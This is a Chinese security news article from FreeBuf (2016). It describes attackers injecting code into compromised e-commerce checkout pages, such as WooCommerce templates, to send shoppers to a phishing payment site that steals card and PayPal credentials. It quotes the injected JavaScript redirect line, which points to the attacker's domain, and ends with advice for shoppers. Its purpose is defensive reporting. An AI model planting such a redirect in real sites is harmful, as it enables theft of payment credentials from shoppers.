说说最近的一个电商网站“钓鱼”案例

在过去的两年里,利用被黑的电商网站对客户的信用卡信息进行钓鱼,这种手法已经非常盛行了。

历史案例

此前我们曾报告过多起案例,黑客在付款页面和支付模块加上了恶意代码,以此来窃取客户的支付信息。客户本身因为并没有太多的特征可以参考,从而很难察觉到这一点。而站长则因为此举不会干扰到支付流程,也不容易发现这点。

与此同时,传统的窃取信用卡信息,或者是银行、PayPal登录信息的活动,也是非常活跃的。

然而,在这个月我们遇到了上述两种类型(单纯的钓鱼网站和被黑的正常站点)的组合攻击,黑客在被黑的电商站点上更改付款页面的代码,然后将客户定向到第三方钓鱼网站的支付页面。

钓鱼黑客通常会使用电子邮件和钓鱼网站去引诱受害者。而在今天介绍的案例中,攻击者直接在被黑的合法电商网站上,劫持了付款页面。

虚假的付款页面

当客户在为商品进行支付时,他们会打开付款页面。但实际上,他们打开的并不是该电商网站支付页面,而是黑客钓鱼网站的支付页面

钓鱼付款页面

它看起来确实像是正常的付款页面,如果受害者是第一次在该网站买东西,不看地址栏的话他们甚至意识不到已经转到一个完全不同的网站。因为受害者已经启动了购物剁手模式,准备输入他们的信用卡账户了,所以这个时候受害者的警惕性是相对要低很多的。最后,你的信用卡信息被盗了,原本合法的电商网站也失去了这单交易。

这种攻击并不是只针对信用卡的。如你前面所见到的,钓鱼也支持PayPal支付。如果你点击了PayPal选项,你会看到跳转到PayPal的登录页面。当然,这里其实是cwcargo钓鱼网站。

当您输入您的登录信息后,钓鱼的php脚本/Checkout/PayPal-login/POST.php,会试图窃取你的PayPal登录信息。处于某种原因,它还会将你导向bluepay.com网站。

我们发现这些付款钓鱼页面,并没有被谷歌官方列入钓鱼站黑名单,所以我们向谷歌进行了报告。当然,我们也向原本的电商站长进行了报告,希望能挽救一些潜在的受害者。

恶意重定向

我们回过头看看那个被黑的电商网站,黑客在这里做的非常简单,只是在支付页面加了一小段JS代码:

<script>document.location="hxxp://cwcargo.com/Checkout"</script>

比如,一个使用了Woo Commerce的WordPress站点,受感染的文件:

wp-content/plugins/woocommerce/templates/checkout/form-checkout.php

会看起来像这样(34行):

这次攻击也影响了其他的金融平台,比如这篇分析,就是感染了主题文件shopping-cart.tpl。

我们现在还没有看到太多受感染的网站,毕竟这类攻击很难进行检测。你需要在完成下单后才能去访问并扫描付款页面,大多数扫描器是不足以做到这一点的。尽管如此,我们发现这类手法在Magento类网站是比较多见的,而且这类攻击的手法可能会随着时间的推移而变化。

保护你的电商网站

基于前面的分析,我们建议客户在网上购物时,每一步都需要保持警惕:

检测URL栏的地址和链接安全性。 检查支付时的订单数量和收款人名称。 在存在疑点的情况下,不要继续进行付款操作。

*参考来源:SU,FB小编dawner编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2016-08-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

钓鱼攻防对抗战的今日现状:防守方完全落后挨打

网络钓鱼主要用来骗取个人敏感信息,从而用于一些恶意目的。今天主要谈钓鱼用来做金融欺诈和身份盗窃的行为,包括对网银、购物等欺诈行为。随着上网人群的增多,钓鱼潜在...

2345
来自专栏FreeBuf

暗影追踪 | 谁是LeakedSource.com的幕后运营者?

在LeakedSource突然关停之际,安全专家Brian Krebs利用蛛丝马迹的线索,通过层层抽丝剥茧,顺藤摸瓜,最终确定了LeakedSource幕后运营...

3115

密码即将消亡,真的假的?

保护敏感私人信息的安全,防止他人对其的窥视,并不仅仅是一个现代的理念,这是我们几个世纪以来一直在表现的一种行为。从根本上来说,只要我们一直试图保护信息安全,那我...

1253
来自专栏FreeBuf

安卓曝大漏洞:一条彩信可控制手机,影响95%设备

以色列移动信息安全公司 Zimperium 研究人员 Joshua Drake 在 Android 系统中发现了多处安全漏洞,Android 2.2到5.1的所...

2477
来自专栏FreeBuf

美国运通印度分公司数据库曝光,致70万人信息泄露

10月23日,Mongo数据库曝出漏洞,通过这个漏洞,任何人都能对数据库进行查看、编辑操作。

1122
来自专栏钱塘大数据

【干货】一篇文章读懂物联网具体架构,推荐收藏!

导读:本文将为你分析物联网的架构方法,全文分为两部分,第一部分从一个抽象的角度了解IoT的参考架构,将涵盖更具体与完整的架构中的各种定义,而第二篇文章将通过实际...

4796
来自专栏智能算法

祝贺 Linux 25 岁:25 个关于 Linux 的惊人真相!

作者:Javen Fang 链接:https://zhuanlan.zhihu.com/p/22222383 简评:给我的最大的印象时,才 25 年,达到这么惊...

4077
来自专栏FreeBuf

Google Play Store启动漏洞赏金计划保护Android应用

? Google终于发布了Google Play Store的漏洞赏金计划,安全人员可以寻找或者报告Android应用中存在的漏洞。 这个项目的名称为 “Go...

2775
来自专栏企鹅号快讯

简析Linux主要应用领域及范围

Linux操作系统主要有以下三大应用领域: 1. Linux作为企业级服务器的应用 Linux系统可以为企业架构WWW服务器、数据库服务器、负载均衡服务器、邮件...

2428
来自专栏即时通讯技术

解密“达达-京东到家”的订单即时派发技术原理和实践

达达-京东到家作为优秀的即时配送物流平台,实现了多渠道的订单配送,包括外卖平台的餐饮订单、新零售的生鲜订单、知名商户的优质订单等。为了提升平台的用户粘性,我们需...

2111

扫码关注云+社区

领取腾讯云代金券